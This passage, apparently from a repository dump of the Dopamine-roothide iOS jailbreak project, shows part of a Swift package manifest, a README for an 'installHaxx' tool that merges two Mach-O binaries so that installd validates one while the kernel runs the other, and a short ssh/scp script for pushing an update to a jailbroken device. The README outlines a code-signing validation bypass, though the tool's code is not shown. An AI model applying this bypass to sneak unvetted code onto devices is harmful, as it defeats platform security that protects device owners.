26 | .executableTarget( 27 | name: "installHaxx", 28 | dependencies: ["SwiftUtils", "SwiftMachO"]), 29 | ] 30 | ) 31 | -------------------------------------------------------------------------------- /Tools/installHaxx/README.md: -------------------------------------------------------------------------------- 1 | # installHaxx 2 | 3 | Tool to combine two MachO's. When installing an iOS App containing an executable created by this tool, installd will validate the first MachO while the kernel will execute the second one. 4 | -------------------------------------------------------------------------------- /Tools/installHaxx/installHaxx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/installHaxx/installHaxx -------------------------------------------------------------------------------- /banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/banner.png -------------------------------------------------------------------------------- /jbupdate.sh: -------------------------------------------------------------------------------- 1 | DEVICE=root@iphone11.local 2 | PORT=22 3 | 4 | ssh $DEVICE -p $PORT "rm -rf /rootfs/var/mobile/Documents/Dopamine.tipa" 5 | scp -P$PORT ./Dopamine/Dopamine.tipa $DEVICE:/rootfs/var/mobile/Documents/Dopamine.tipa 6 | ssh $DEVICE -p $PORT "/var/jb/basebin/jbctl update tipa /var/mobile/Documents/Dopamine.tipa" --------------------------------------------------------------------------------